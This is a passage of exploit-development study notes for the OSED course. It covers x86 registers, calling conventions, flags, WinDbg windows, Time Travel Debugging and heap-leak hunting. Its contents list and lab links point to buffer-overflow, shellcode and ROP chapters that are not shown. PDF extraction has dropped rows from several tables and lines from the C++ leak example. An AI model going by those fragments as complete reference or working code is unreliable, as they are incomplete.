OSED Notes Study Overview by Joas Antonio
OSED Notes Study Overview by Joas Antonio
https://www.linkedin.com/in/joas-antonio-dos-santos
Sumário
OSED Notes by Joas Antonio and Alex ..................................................................................... 1
Laboratory..................................................................................................................................... 3
X86 Architecture ........................................................................................................................... 3
CPU Register ............................................................................................................................... 10
General Purpose Registers .......................................................................................... 15
eax ...................................................................................................................................... 15
ebx ...................................................................................................................................... 15
ecx....................................................................................................................................... 15
edx ...................................................................................................................................... 16
esi........................................................................................................................................ 16
edi ....................................................................................................................................... 16
ebp ...................................................................................................................................... 16
esp ...................................................................................................................................... 16
Special Purpose Registers ............................................................................................ 16
eip ....................................................................................................................................... 16
flags .................................................................................................................................... 17
Introduction Windows Debugger............................................................................................... 17
Windows Register ....................................................................................................................... 32
Controlling Execution with Windbg ........................................................................................... 38
Stack Based Buffer Overflow...................................................................................................... 40
Data Execution Prevention................................................................................................... 112
Address Space Layout Randomization ................................................................................. 113
Control Flow Guard .............................................................................................................. 115
Stack Buffer Overflow - Jumping Shellcode ............................................................................. 120
SEH Buffer Overflow ................................................................................................................. 160
Finding Bad Characters ......................................................................................................... 205
IDA Pro ...................................................................................................................................... 238
Windows ASLR Bypass .............................................................................................................. 256
Egg Hunters ............................................................................................................................... 265
Introduction to the Win32 Egghunter.................................................................................. 290
SEH Buffer Overflow EggHunter ........................................................................................... 308
Shellcode ................................................................................................................................... 335
Shellcode Encode and Decode ............................................................................................. 406
Creating Shellcode Encoded ................................................................................................. 418
DEP Bypass ................................................................................................................................ 429
Overwriting EIP ......................................................................................................................... 457
ASLR Bypass .............................................................................................................................. 496
Return Oriented Programming ................................................................................................ 499
Rop Chain .............................................................................................................................. 505
Rop Decode ........................................................................................................................... 591
Reversing Engineering .............................................................................................................. 591
Reverse Engineering with Immunity Debugger ................................................................... 596
Reverse Engineering with GDB............................................................................................. 597
Assembly and C/C++ Courses ................................................................................................... 608
Study Material – OSED ............................................................................................................. 609
Laboratory
https://github.com/CyberSecurityUP/Buffer-Overflow-Labs
https://github.com/firmianay/Life-long-Learner/blob/master/SEED-labs/buffer-overflow-
vulnerability-lab.md
https://github.com/Jeffery-Liu/Buffer-Overflow-Vulnerability-Lab
https://github.com/tecnico-sec/Buffer-Overflow
https://github.com/epi052/osed-scripts
SLMail 5.5
X86 Architecture
What Does x86 Architecture Mean?
The x86 architecture is an instruction set architecture (ISA) series for computer processors.
Developed by Intel Corporation, x86 architecture defines how a processor handles and
executes different instructions passed from the operating system (OS) and software programs.
The “x” in x86 denotes ISA version.
Designed in 1978, x86 architecture was one of the first ISAs for microprocessor-based
computing. Key features include:
Allows software programs and instructions to run on any processor in the Intel 8086 family
Provides procedures for utilizing and managing the hardware components of a central
processing unit (CPU)
The x86 architecture primarily handles programmatic functions and provides services, such as
memory addressing, software and hardware interrupt handling, data type, registers and
input/output (I/O) management.
https://www.techopedia.com/definition/5334/x86-architecture
The Intel x86 processor uses complex instruction set computer (CISC) architecture, which
means there is a modest number of special-purpose registers instead of large quantities of
general-purpose registers. It also means that complex special-purpose instructions will
predominate.
The x86 processor traces its heritage at least as far back as the 8-bit Intel 8080 processor.
Many peculiarities in the x86 instruction set are due to the backward compatibility with that
processor (and with its Zilog Z-80 variant).
Microsoft Win32 uses the x86 processor in 32-bit flat mode. This documentation will focus only
on the flat mode.
Registers
eax Accumulator
edx Data register - can be used for I/O port access and arithmetic functions
All integer registers are 32 bit. However, many of them have 16-bit or 8-bit subregisters.
ah High 8 bits of ax
bh High 8 bits of bx
ch High 8 bits of cx
dh High 8 bits of dx
Operating on a subregister affects only the subregister and none of the parts outside the
subregister. For example, storing to the ax register leaves the high 16 bits of the eax register
unchanged.
When using the ? (Evaluate Expression) command, registers should be prefixed with an "at"
sign ( @ ). For example, you should use ? @ax rather than ? ax. This ensures that the debugger
recognizes ax as a register rather than a symbol.
However, the (@) is not required in the r (Registers) command. For instance, r ax=5 will always
be interpreted correctly.
Two other registers are important for the processor's current state.
flags flags
Calling Conventions
The x86 architecture has several different calling conventions. Fortunately, they all follow the
same register preservation and function return rules:
• Functions must preserve all registers, except for eax, ecx, and edx, which can be
changed across a function call, and esp, which must be updated according to the
calling convention.
• The eax register receives function return values if the result is 32 bits or smaller. If the
result is 64 bits, then the result is stored in the edx:eax pair.
• Win32 (__stdcall)
Function parameters are passed on the stack, pushed right to left, and the callee cleans the
stack.
Function parameters are passed on the stack, pushed right to left, the "this" pointer is passed
in the ecx register, and the callee cleans the stack.
Function parameters are passed on the stack, pushed right to left, then the "this" pointer is
pushed on the stack, and then the function is called. The callee cleans the stack.
• __fastcall
The first two DWORD-or-smaller arguments are passed in the ecx and edx registers. The
remaining parameters are passed on the stack, pushed right to left. The callee cleans the stack.
• __cdecl
Function parameters are passed on the stack, pushed right to left, and the caller cleans the
stack. The __cdecl calling convention is used for all functions with variable-length parameters.
dbgcmdCopy
In user-mode debugging, you can ignore the iopl and the entire last line of the debugger
display.
x86 Flags
In the preceding example, the two-letter codes at the end of the second line are flags. These
are single-bit registers and have a variety of uses.
tf Trap Flag If tf equals 1, the processor will raise a STATUS_SINGLE_STEP exception after the
execution of one instruction. This flag is used by a debugger to implement single
tracing. It should not be used by other applications.
iopl I/O Privilege I/O Privilege Level This is a two-bit integer, with values between zero and 3. It is
Level by the operating system to control access to hardware. It should not be used by
applications.
When registers are displayed as a result of some command in the Debugger Command
window, it is the flag status that is displayed. However, if you want to change a flag using the r
(Registers) command, you should refer to it by the flag code.
In the Registers window of WinDbg, the flag code is used to view or alter flags. The flag status
is not supported.
Here is an example. In the preceding register display, the flag status ng appears. This means
that the sign flag is currently set to 1. To change this, use the following command:
dbgcmdCopy
r sf=0
This sets the sign flag to zero. If you do another register display, the ng status code will not
appear. Instead, the pl status code will be displayed.
The Sign Flag, Zero Flag, and Carry Flag are the most commonly-used flags.
Conditions
A condition describes the state of one or more flags. All conditional operations on the x86 are
expressed in terms of conditions.
The assembler uses a one or two letter abbreviation to represent a condition. A condition can
be represented by multiple abbreviations. For example, AE ("above or equal") is the same
condition as NB ("not below"). The following table lists some common conditions and their
meaning.
C CF=1 Last operation required a carry or borrow. (For unsigned integers, this indicates overflow.)
NC CF=0 Last operation did not require a carry or borrow. (For unsigned integers, this indicates overfl
O OF=1 When treated as a signed integer operation, the last operation caused an overflow or under
NO OF=0 When treated as signed integer operation, the last operation did not cause an overflow or
underflow.
Conditions can also be used to compare two values. The cmp instruction compares its two
operands, and then sets flags as if subtracted one operand from the other. The following
conditions can be used to check the result of cmp value1, value2.
LE NG ZF=1 or SF!=OF value1 <= value2. Values are treated as signed integers.
G NLE ZF=0 and SF=OF value1 > value2. Values are treated as signed integers.
L NGE SF!=OF value1 < value2. Values are treated as signed integers.
BE NA CF=1 or ZF=1 value1 <= value2. Values are treated as unsigned integers.
A NBE CF=0 and ZF=0 value1 > value2. Values are treated as unsigned integers.
B NAE CF=1 value1 < value2. Values are treated as unsigned integers.
Conditions are typically used to act on the result of a cmp or test instruction. For example,
asmCopy
cmp eax, 5
jz equal
compares the eax register against the number 5 by computing the expression (eax - 5) and
setting flags according to the result. If the result of the subtraction is zero, then the zr flag will
be set, and the jz condition will be true so the jump will be taken.
Data Types
• byte: 8 bits
• word: 16 bits
• dword: 32 bits
Notation
The following table indicates the notation used to describe assembly language instructions.
Notation Meaning
m Memory address (see the succeeding Addressing Modes section for more information.)
#n Immediate constant
Addressing Modes
There are several different addressing modes, but they all take the form T ptr [expr],
where T is some data type (see the preceding Data Types section) and expr is some expression
involving constants and registers.
The notation for most modes can be deduced without much difficulty. For example, BYTE PTR
[esi+edx*8+3] means "take the value of the esi register, add to it eight times the value of
the edx register, add three, then access the byte at the resulting address."
Pipelining
The Pentium is dual-issue, which means that it can perform up to two actions in one clock tick.
However, the rules on when it is capable of doing two actions at once (known as pairing) are
very complicated.
Because x86 is a CISC processor, you do not have to worry about jump delay slots.
Load, modify, and store instructions can receive a lock prefix, which modifies the instruction as
follows:
1. Before issuing the instruction, the CPU will flush all pending memory operations to
ensure coherency. All data prefetches are abandoned.
2. While issuing the instruction, the CPU will have exclusive access to the bus. This
ensures the atomicity of the load/modify/store operation.
The xchg instruction automatically obeys the previous rules whenever it exchanges a value
with memory.
Jump Prediction
Conditional jumps are predicted to be taken or not taken, depending on whether they were
taken the last time they were executed. The cache for recording jump history is limited in size.
If the CPU does not have a record of whether the conditional jump was taken or not taken the
last time it was executed, it predicts backward conditional jumps as taken and forward
conditional jumps as not taken.
Alignment
The x86 processor will automatically correct unaligned memory access, at a performance
penalty. No exception is raised.
A memory access is considered aligned if the address is an integer multiple of the object size.
For example, all BYTE accesses are aligned (everything is an integer multiple of 1), WORD
accesses to even addresses are aligned, and DWORD addresses must be a multiple of 4 in
order to be aligned.
The lock prefix should not be used for unaligned memory accesses.
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/x86-architecture
https://opensecuritytraining.info/IntermediateX86.html
https://www.youtube.com/watch?v=OJxHs-DSQkc
CPU Register
In Computer Architecture, the Registers are very fast computer memory which are used to
execute programs and operations efficiently. This does by giving access to commonly used
values, i.e., the values which are in the point of operation/execution at that time. So, for this
purpose, there are several different classes of CPU registers which works in coordination with
the computer memory to run operations efficiently.
The sole purpose of having register is fast retrieval of data for processing by CPU. Though
accessing instructions from RAM is comparatively faster with hard drive, it still isn’t enough for
CPU. For even better processing, there are memories in CPU which can get data from RAM
which are about to be executed beforehand. After registers we have cache memory, which are
faster but less faster than registers.
• Accumulator:
This is the most frequently used register used to store data taken from memory. It is in
different numbers in different microprocessors.
So, these are the different registers which are operating for a specific purpose.
https://www.geeksforgeeks.org/different-classes-of-cpu-registers/
For CPU processing these register plays a critical role. When we give the input, these are
stored and in register processes and the output is from the register only.
• Fetch: To fetch the instructions of the user also the instructions that are present in the
main memory in a sorted way
• Decode: The second operation is to decode the instructions that need to perform.
Thus CPU will be knowing what are the instructions
• Execute: Once the instructions are decoded then execute operation is performed by
the CPU. Once done the result is presented on the user screen
• Accumulator (AC)
• Flag Register
These registers are the most important integral part of the computer and each of these are
having a specific purpose. Let us see below
1. Accumulator
Accumulator register is part of ALU which abbreviates to Arithmetic Logical Unit and as the
name suggests is responsible for performing arithmetic operations and also in logical
operations. The Control unit will store the data values which are fetched from the main
memory into the accumulator for the arithmetic or any other logical operations. This register
holds the initial data, intermediate results and asl well as the final result of the instruction. The
final result of the operations which can be arithmetic or logical will be transferred to the main
memory through MBR
2. Flag Register
This register validates or checks upon the various occurrences of a condition in CPU and is
handled by this special register called flag register. The size of this register is one or two bytes
since it will hold only flag information. This register main gets into the picture when a
condition is being operated.
3. Data Register
This register is used to temporarily store the data being transmitted from the other involved
peripheral devices.
4. Address register
This address the register also called memory address register MAR is a memory unit that stores
the address location od data or instructions on the main memory. They contain a portion of
the address which can be used to compute the complete address.
5. Program Counter
This register is also known popularly as an instruction pointer register. This register as the
name suggests will be holding the address of the next instruction that needs to be fetched and
executed or performed. When the instruction is fetched then the value is incremented and
hence will always be holding the address of the next instruction to be run.
6. Instruction Register
Once the instruction is fetched from the main memory it is stored in Instruction Register IR.
The control units take the instructions from here decodes it and executes it by sending the
required signals to the required component.
As the work stack in the name of this register represents block, here it represents a set of
memory blocks where the data is stored in and as well as fetched. FILO which is First IN and
Last Out will be followed for the storing and retrieval of the data.
This register holds the information or the data which is read from or written in the memory.
The content or the instructions stored in this register will be transferred to Instruction Register
IR whereas the content of the data is transferred to the accumulator or I/O register.
9. Index Register
The index register is an integral part of computer CPU which will help in modifying the address
of the memory operand during the execution of the program. Basically the contents of the
index register are added to the immediate address to get the resultant the effective address of
data or instruction on the memory.
For the fast operations of an instruction, the CPU register is highly useful. Without theses CPU
operation is unimaginable. These are the fastest memory when we look at the different
memory and Laos will hold the top position in the memory hierarchy. A register can hold an
instruction, address, or any other sort of data. There are different types of registers available
and we have seen most used in the above part of the article. Thus having register, it makes the
operations of CPU smooth efficient and meaningfull. A register must be large enough
according to ist requirements and specifications.
Advantages
• These are fastest memory blocks and hence instructions are executed fastly compared
to main memory
• Since each register purpose is different, and instructions will be handled with grace
and smoothness by the CPU with the help of registers
• There are rarely any CPU that will not be having register in the digital world
Disadvantages
Let us take a look at the disadvantages:
• Since the memory size of the register is finite and if the instruction is bigger then cpu
need to use cache or main memory along with register for the operation
https://www.educba.com/what-is-cpu-register/
Some registers are typically volatile across functions, and others remain unchanged. This is a
feature of the compiler's standards and must be looked after in the code, registers are not
preserved automatically (although in some assembly languages they are -- but not in x86).
What that means is, when a function is called, there is no guarantee that volatile registers will
retain their value when the function returns, and it's the function's responsibility to preserve
non-volatile registers.
eax
eax is a 32-bit general-purpose register with two common uses: to store the return value of
a function and as a special register for certain calculations. It is technically a volatile
register, since the value isn't preserved. Instead, its value is set to the return value of a
function before a function returns. Other than esp, this is probably the most important
register to remember for this reason. eax is also used specifically in certain calculations,
such as multiplication and division, as a special register. That use will be examined in the
instructions section.
Here is an example of a function returning in C:
ebx
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a
commonly used value (such as 0) throughout a function to speed up calculations.
ecx
ecx is a volatile general-purpose register that is occasionally used as a function parameter
or as a loop counter.
Functions of the "__fastcall" convention pass the first two parameters to a function using
ecx and edx. Additionally, when calling a member function of a class, a pointer to that class
is often passed in ecx no matter what the calling convention is.
Additionally, ecx is often used as a loop counter. for loops generally, although not always,
set the accumulator variable to ecx. rep- instructions also use ecx as a counter,
automatically decrementing it till it reaches 0. This class of function will be discussed in a
later section.
edx
edx is a volatile general-purpose register that is occasionally used as a function parameter.
Like ecx, edx is used for "__fastcall" functions.
Besides fastcall, edx is generally used for storing short-term variables within a function.
esi
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for
"rep-" class instructions, which require a source and a destination for data, esi points to the
"source". esi often stores data that is used throughout a function because it doesn't change.
edi
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to
esi, except that it is generally used as a destination for data.
ebp
ebp is a non-volatile general-purpose register that has two distinct uses depending on
compile settings: it is either the frame pointer or a general purpose register.
If compilation is not optimized, or code is written by hand, ebp keeps track of where the
stack is at the beginning of a function (the stack will be explained in great detail in a later
section). Because the stack changes throughout a function, having ebp set to the original
value allows variables stored on the stack to be referenced easily. This will be explored in
detail when the stack is explained.
If compilation is optimized, ebp is used as a general register for storing any kind of data,
while calculations for the stack pointer are done based on the stack pointer moving (which
gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)
esp
esp is a special register that stores a pointer to the top of the stack (the top is actually at a
lower virtual address than the bottom as the stack grows downwards in memory towards
the heap). Math is rarely done directly on esp, and the value of esp must be the same at
the beginning and the end of each function. esp will be examined in much greater detail in
a later section.
eip
eip, or the instruction pointer, is a special-purpose register which stores a pointer to the
address of the instruction that is currently executing. Making a jump is like adding to or
subtracting from the instruction pointer.
After each instruction, a value equal to the size of the instruction is added to eip, which
means that eip points at the machine code for the next instruction. This simple example
shows the automatic addition to eip at every step:
flags
In the flags register, each bit has a specific meaning and they are used to store meta-
information about the results of previous operations. For example, whether the last
calculation overflowed the register or whether the operands were equal. Our interest in the
flags register is usually around the cmp and test operations which will commonly set or
unset the zero, carry and overflow flags. These flags will then be tested by a conditional
jump which may be controlling program flow or a loop.
https://wiki.skullsecurity.org/index.php/Registers
Time Travel Debugging, is a tool that allows you to record an execution of your process
running, then replay it later both forwards and backwards. Time Travel Debugging (TTD) can
help you debug issues easier by letting you "rewind" your debugger session, instead of having
to reproduce the issue until you find the bug.
TTD allows you to go back in time to better understand the conditions that lead up to the bug
and replay it multiple times to learn how best to fix the problem.
TTD can have advantages over crash dump files, which often are missing the code execution
that led up to the ultimate failure.
In the event you can't figure out the issue yourself, you can share the trace with a co-worker
and they can look at exactly what you're looking at. This can allow for easier collaboration than
live debugging, as the recorded instructions are the same, where the address locations and
code execution will be different on different PCs. You can also share a specific point in time to
help your co-worker figure out where to start.
TTD is efficient and works to add as little as possible overhead as it captures code execution in
trace files.
TTD includes a set of debugger data model objects to allow you to query the trace using LINQ.
For example, you can use TTD objects to locate when a specific code module was loaded or
locate all of the exceptions.
This table summarizes the pros and cons of the different debugging solutions available.
Live Interactive experience, sees flow Disrupts the user experience, may require effort to
debugging of execution, can change target reproduce the issue repeatedly, may impact security, not
state, familiar tool in familiar always an option on production systems. With repro
setting. difficult to work back from point of failure to determine
cause.
Dumps No coding upfront, low- Successive snapshot or live dumps provide a simple
intrusiveness, based on triggers. “over time” view. Overhead is essentially zero if not
used.
Telemetry & Lightweight, often tied to Issues arise in unexpected code paths (with no
logs business scenarios / user actions, telemetry). Lack of data depth, statically compiled into
machine learning friendly. the code.
Time Travel Great at complex bugs, no coding Large overhead at record time. May collect more data
Debugging upfront, offline repeatable that is needed. Data files can become large.
(TTD)
Approach Pros Cons
TTD Availability
TTD is available on Windows 10 after installing the WinDbg Preview app from the Store.
WinDbg Preview is an improved version of WinDbg with more modern visuals, faster windows,
a full-fledged scripting experience, with built in support for the extensible debugger data
model. For more information on downloading WinDbg Preview from the store, see Debugging
Using WinDbg Preview.
To use TTD, you need to run the debugger elevated. Install WinDbg Preview using an account
that has administrator privileges and use that account when recording in the debugger. In
order to run the debugger elevated, select and hold (or right-click) the WinDbg Preview icon in
the Start menu and then select More > Run as Administrator.
https://docs.microsoft.com/en-gb/windows-hardware/drivers/debugger/time-travel-
debugging-overview
https://docs.microsoft.com/pt-br/windows-hardware/drivers/debugger/debugger-download-
tools
https://developer.microsoft.com/en-us/windows/hardware/download-windbg
Disassembly Window
To open or switch to the Disassembly window, in the WinDbg window, on the View menu,
click Disassembly. (You can also press ALT+7 or click the Disassembly (Alt+7) button ( ) on
the toolbar. ALT+SHIFT+7 will close the Disassembly Window.)
• To disassemble a different section of memory, in the Offset box, type the address of
the memory you want to disassemble. (You can press ENTER after typing the address,
but you do not have to.) The Disassembly window displays code before you have
completed the address; you can disregard this code.
• To see other sections of memory, click the Previous or Next button or press the
PAGE UP or PAGE DOWN keys. These commands display disassembled code from the
preceding or following sections of memory, respectively. By pressing the RIGHT
ARROW, LEFT ARROR, UP ARROW, and DOWN ARROW keys, you can navigate within
the window. If you use these keys to move off of the page, a new page will appear.
• If you want to disassemble a section of memory that does not contain machine
instructions, the debugger displays error messages.
• The line that represents the current program counter is highlighted in green, unless
you select a line with the mouse or by using one of the Edit | Go to Xxx commands. If
you select a line with the mouse or a Edit | Go to Xxx command, the selected line is
green and the line that represents the current program counter is not highlighted.
The Disassembly window has a toolbar that contains two buttons and a shortcut menu with
additional commands. To access the menu, right-click the title bar or click the icon that
appears near the upper-right corner of the window ( ). The toolbar and menu contain the
following commands:
• (Toolbar only) The Offset box enables you to specify a new address for disassembly.
• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) causes the debugger to disassemble and display the instructions immediately
prior to the current display.
• (Toolbar and menu) Next (on the toolbar) or Next page (on the shortcut menu) causes
the debugger to disassemble and display the instructions immediately after the
current display.
• (Menu only) Go to current address opens the Source window with the source file that
corresponds to the selected line in the Disassembly window and highlights this line.
• (Menu only) Disassemble before current instruction causes the current line to be
placed in the middle of the Disassembly window. This command is the default option.
If this command is cleared the current line will appear at the top of the Disassembly
window, which saves time because reverse-direction disassembly can be time-
consuming.
• (Menu only) Highlight instructions from the current source line causes all of the
instructions that correspond to the current source line to be highlighted. Often, a
single source line will correspond to multiple assembly instructions. If code has been
optimized, these assembly instructions might not be consecutive. This command
enables you to find all of the instructions that were assembled from the current source
line.
• (Menu only) Show source line for each instruction displays the source line number
that corresponds to each assembly instruction.
• (Menu only) Show source file for each instruction displays the source file name that
corresponds to each assembly instruction.
• (Menu only) Dock or Undock causes the window to enter or leave the docked state.
• (Menu only) Move to new dock closes the Disassembly window and opens it in a new
dock.
• (Menu only) Set as tab-dock target for window type is unavailable for the Disassembly
window. This option is only available for Source or Memory windows.
• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.
• (Menu only) Move with frame causes the window to move when the WinDbg frame is
moved, even if the window is undocked. For more information about docked, tabbed,
and floating windows, see Positioning the Windows.
• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.
• (Menu only) Close closes this window.
http://www.dbgtech.net/windbghelp/hh/debugger/r36_gui_1_f9c06d65-64ae-4439-bb41-
318a12e6c859.xml.htm
You can view memory by entering one of the Display Memory commands in the Debugger
Command window. You can edit memory by entering one of the Enter Values commands in
the Debugger Command window. For more information, see Accessing Memory by Virtual
Address and Accessing Memory by Physical Address.
To open a Memory window, choose Memory from the View menu. (You can also press ALT+5
or select the Memory button ( ) on the toolbar. ALT+SHIFT+5 closes the active Memory
window.)
The Memory window displays data in several columns. The column on the left side of the
window shows the beginning address of each line. The remaining columns display the
requested information, from left to right. If you select Bytes in the Display format menu, the
ASCII characters that correspond to these bytes are displayed in the right side of the window.
Note By default, the Memory window displays virtual memory. This type of memory is the
only type of memory that is available in user mode. In kernel mode, you can use the Memory
Options dialog box to display physical memory and other data spaces. The Memory
Options dialog box is described later in this topic.
In the Memory window, you can do the following:
• To write to memory, select inside the Memory window and type new data. You can
edit only hexadecimal data—you cannot directly edit ASCII and Unicode characters.
Changes take effect as soon as you type new information.
• To see other sections of memory, use the Previous and Next buttons on the Memory
window toolbar, or press the PAGE UP or PAGE DOWN keys. These buttons and keys
display the immediately preceding or following sections of memory. If you request an
invalid page, an error message appears.
• To navigate within the window, use the RIGHT ARROW, LEFT ARROW, UP ARROW, and
DOWN ARROW keys. If you use these keys to move off of the page, a new page is
displayed. Before you use these keys, you should resize the Memory window so that it
does not have scroll bars. This sizing enables you to distinguish between the actual
page edge and the window cutoff.
• To change the memory location that is being viewed, enter a new address into the
address box at the top of the Memory window. Note that the Memory window
refreshes its display while you enter an address, so you could get error messages
before you have completed typing the address. Note The address that you enter into
the box is interpreted in the current radix. If the current radix is not 16, you should
prefix a hexadecimal address with 0x. To change the default radix, use the n (Set
Number Base) command in the Debugger Command window. The display within the
Memory window itself is not affected by the current radix.
• To change the data type that the window uses to display memory, use the Display
format menu in the Memory window toolbar. Supported data types include short
words, double words, and quad-words; short, long, and quad integers and unsigned
integers; 10-byte, 16-byte, 32-byte, and 64-byte real numbers; ASCII characters;
Unicode characters; and hexadecimal bytes. The display of hexadecimal bytes includes
ASCII characters as well.
The Memory window has a toolbar that contains two buttons, a menu, and a box and has a
shortcut menu with additional commands. To access the menu, select and hold (or right-click)
the title bar or select the icon near the upper-right corner of the window ( ). The toolbar
and shortcut menu contain the following choices:
• (Toolbar only) The address box enables you to specify a new address or offset. The
exact meaning of this box depends on the memory type you are viewing. For example,
if you are viewing virtual memory, the box enables you to specify a new virtual address
or offset.
• (Toolbar only) Display format enables you to select a new display format.
• (Toolbar and menu) Previous (on the toolbar) and Previous page (on the shortcut
menu) cause the previous section of memory to be displayed.
• (Toolbar and menu) Next (on the toolbar) and Next page (on the shortcut menu) cause
the next section of memory to be displayed.
• (Menu only) Dock or Undock causes the window to enter or leave the docked state.
• (Menu only) Move to new dock closes the Memory window and opens it in a new
dock.
• (Menu only) Set as tab-dock target for window type sets the selected Memory
window as the tab-dock target for other Memory windows. All Memory windows that
are opened after one is chosen as the tab-dock target are automatically grouped with
that window in a tabbed collection.
• (Menu only) Always floating causes the window to remain undocked even if it is
dragged to a docking location.
• (Menu only) Move with frame causes the window to move when the WinDbg frame is
moved, even if the window is undocked. For more information about docked, tabbed,
and floating windows, see Positioning the Windows.
• (Menu only) Properties opens the Memory Options dialog box, which is described in
the following section within this topic.
• (Menu only) Help opens this topic in the Debugging Tools for Windows
documentation.
When you select Properties on the shortcut menu, the Memory Options dialog box appears.
In kernel mode, there are six memory types available as tabs in this dialog box: Virtual
Memory, Physical Memory, Bus Data, Control Data, I/O (I/O port information),
and MSR (model-specific register information). Select the tab that corresponds to the
information that you want to access.
Each tab enables you to specify the memory that you want to display:
• In the Virtual Memory tab, in the Offset box, specify the address or offset of the
beginning of the memory range that you want to view.
• In the Physical Memory tab, in the Offset box, specify the physical address of the
beginning of the memory range that you want to view. The Memory window can
display only described, cacheable physical memory. If you want to display physical
memory that has other attributes, use the d* (Display Memory) command or
the !d\* extension.
• In the Bus Data tab, in the Bus Data Type menu, specify the bus data type. Then, use
the Bus number, Slot number, and Offset boxes to specify the bus data that you want
to view.
• In the Control Data tab, use the Processor and Offset text boxes to specify the control
data that you want to view.
• In the I/O tab, in the Interface Type menu, specify the I/O interface type. Use the Bus
number, Address space, and Offset boxes to specify the data that you want to view.
• In the MSR tab, in the MSR box, specify the model-specific register that you want to
view.
Each tab also includes a Display format menu. This menu has the same effect as the Display
format menu in the Memory window.
Select OK in the Memory Options dialog box to cause your changes to take effect.
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/memory-window
Command
• Prefer DML
Memory
Source
• Run to cursor
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-notes-etc-
preview
Introduction
Memory leak is a time consuming bug often created by C++ developers. Detection of memory
leaks is often tedious. Things get worst if the code is not written by you, or if the code base is
quite huge.
Though there are tools available in the market that will help you in memory leak detection,
most of these tools are not free. I found Windbg as a freeware powerful tool to solve memory
leak bugs. At least, we get an idea about the code location which might be suspected to cause
memory leaks. COM Interface leaks are out of the scope of this article.
Windbg is a powerful user/kernel space debugger from Microsoft, which can be downloaded
and installed from here.
Using Windbg
2. Add your program EXE/DLL PDB (program database) path to the symbol file path.
3. You also need to to configure the Operating System's flag to enable user stack trace for
the process which has memory leaks. This is simple, and can be done
with gflags.exe. Gflags.exe is installed during Windbg's installation. This can also be
done through command line, using the command “gflags.exe /i MemoryLeak.exe
+ust”. My program name is Test2.exe; hence, for the demo, I will be
using Test2.exe rather than MemoryLeak.exe. The snapshot below shows the setting of
OS flags for the application Test2.exe.
Once we have configured Windbg for the symbol file path, start the process which is leaking
memory, and attach Windbg to it. The Attach option in Windbg is available under the File
menu, or can be launched using the F6 shortcut. The snapshot below shows the same:
The !heap command of Windbg is used to display heaps. !heap is well documented in the
Windbg help.
I have developed a small program which leaks memory, and will demonstrate further using the
same.
C++
Copy Code
{ while(1)
AllocateMemory();
return 0;
void AllocateMemory()
{
ZeroMemory(a, 8000);
Sleep(1);
After attaching Windbg to the process, execute the !heap –s command. -s stands for summary.
Below is the output of the !heap -s for the leaking process:
Copy Code
0:001> !heap -s
validate parameters
Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast
-----------------------------------------------------------------------------
00250000 58001062 64 24 24 15 1 1 0 0 L
00260000 58008060 64 12 12 10 1 1 0 0
-----------------------------------------------------------------------------
Let the process execute for some time, and then re-break in to the process, and execute !heap
-s again. Shown below is the output of the command:
Copy Code
0:001> !heap -s
validate parameters
Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast
-----------------------------------------------------------------------------
00260000 58008060 64 12 12 10 1 1 0 0
-----------------------------------------------------------------------------
Lines marked in bold show the growing heap. The above snapshot shows a heap with the
handle 00330000 growing.
Execute “!heap -stat –h 00330000” for the growing heap. This command shows the heap
statistics for the growing heap. Shown below is the command's output.
Copy Code
heap @ 00330000
4c 5 - 17c (0.00)
b0 2 - 160 (0.00)
86 2 - 10c (0.00)
50 3 - f0 (0.00)
74 2 - e8 (0.00)
38 4 - e0 (0.00)
48 3 - d8 (0.00)
c4 1 - c4 (0.00)
62 2 - c4 (0.00)
be 1 - be (0.00)
b8 1 - b8 (0.00)
ae 1 - ae (0.00)
ac 1 - ac (0.00)
55 2 - aa (0.00)
a4 1 - a4 (0.00)
The above snapshot shows 0x76c6 blocks of size 1f64 being allocated (marked in bold). Such a
huge number of blocks of the same size makes us suspect that these can be leaked blocks. Rest
of the block allocations do not have growing block numbers.
The next step is to get the address of these blocks. Use the command !heap -flt s 1f64. This
command filters all other blocks of heap and displays the details of blocks having size 1f64.
_HEAP @ 150000
_HEAP @ 250000
_HEAP @ 260000
_HEAP @ 330000
Use any UsrPtr column value from the listed output, and then use the the command !heap -p -
a UsrPtr to display the call stack for UsrPtr. I have selected 0143d8c8 marked in bold.
Upon execution of !heap -p -a 0143d8c8, we get the call stack shown below:
Copy Code
Trace: 0025
7c96d6dc ntdll!RtlDebugAllocateHeap+0x000000e1
7c949d18 ntdll!RtlAllocateHeapSlowly+0x00000044
7c91b298 ntdll!RtlAllocateHeap+0x00000e64
102c103e MSVCR90D!_heap_alloc_base+0x0000005e
102cfd76 MSVCR90D!_heap_alloc_dbg_impl+0x000001f6
102cfb2f MSVCR90D!_nh_malloc_dbg_impl+0x0000001f
102cfadc MSVCR90D!_nh_malloc_dbg+0x0000002c
102db25b MSVCR90D!malloc+0x0000001b
4113d8 Test2!AllocateMemory+0x00000028
41145c Test2!wmain+0x0000002c
411a08 Test2!__tmainCRTStartup+0x000001a8
41184f Test2!wmainCRTStartup+0x0000000f
7c816fd7 kernel32!BaseProcessStart+0x00000023
The lines marked in bold shows the functions from our code.
Note: Sometimes, it might happen that the “!heap -s” command does not show a growing
heap. In that case, use the “!heap -stat -h” command to list all the heaps with their sizes and
number of blocks. Spot the growing number of blocks, and then use the “!heap –flt s SIZE”
(SIZE = the size of the suspected block) command.
https://www.codeproject.com/Articles/31382/Memory-Leak-Detection-Using-Windbg
Windows Register
Description of the registry
The Microsoft Computer Dictionary, Fifth Edition, defines the registry as:
